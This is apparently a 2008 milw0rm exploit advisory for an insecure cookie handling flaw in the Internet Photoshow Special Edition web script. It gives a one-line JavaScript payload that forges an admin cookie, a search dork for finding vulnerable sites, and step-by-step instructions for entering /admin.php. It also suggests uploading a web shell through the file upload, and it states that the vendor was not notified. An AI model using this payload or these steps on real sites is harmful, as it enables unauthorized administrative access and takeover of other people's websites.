54 lines
No EOL
1.4 KiB
Text
54 lines
No EOL
1.4 KiB
Text
--==+================================================================================+==--
|
|
--==+ Internet Photoshow (Special Edition) Insecure Cookie Handling +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
Discovered By: t0pP8uZz
|
|
Discovered On: 14 MAY 2008
|
|
Script Download: http://www.thomas-voecking.de/downloads/ps_se_fire.zip
|
|
DORK: "Internet Photoshow - Slideshow"
|
|
|
|
|
|
|
|
Vendor Has Not Been Notified!
|
|
|
|
|
|
|
|
DESCRIPTION:
|
|
|
|
Internet Photoshow SE, suffers from insecure cookie handling, This allows the remote attacker to gain
|
|
arbitrary access to the admin area by crafting a admin cookie.
|
|
|
|
the following javascript code will craft a admin cookie, and make it available to access /admin.php
|
|
|
|
|
|
|
|
Exploit:
|
|
|
|
javascript:document.cookie = "login_admin=true; path=/";
|
|
|
|
|
|
|
|
NOTE/TIP:
|
|
|
|
visit the affected domain and paste the above javascript into your browser, once excuted visit the
|
|
affected sites "/admin.php" and you will have access to admin.
|
|
|
|
its also possible to shell the site by uploading your shell through the file upload.
|
|
|
|
|
|
|
|
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
|
|
|
|
|
|
|
|
peace, t0pP8uZz
|
|
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ Internet Photoshow (Special Edition) Insecure Cookie Handling +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2008-05-14] |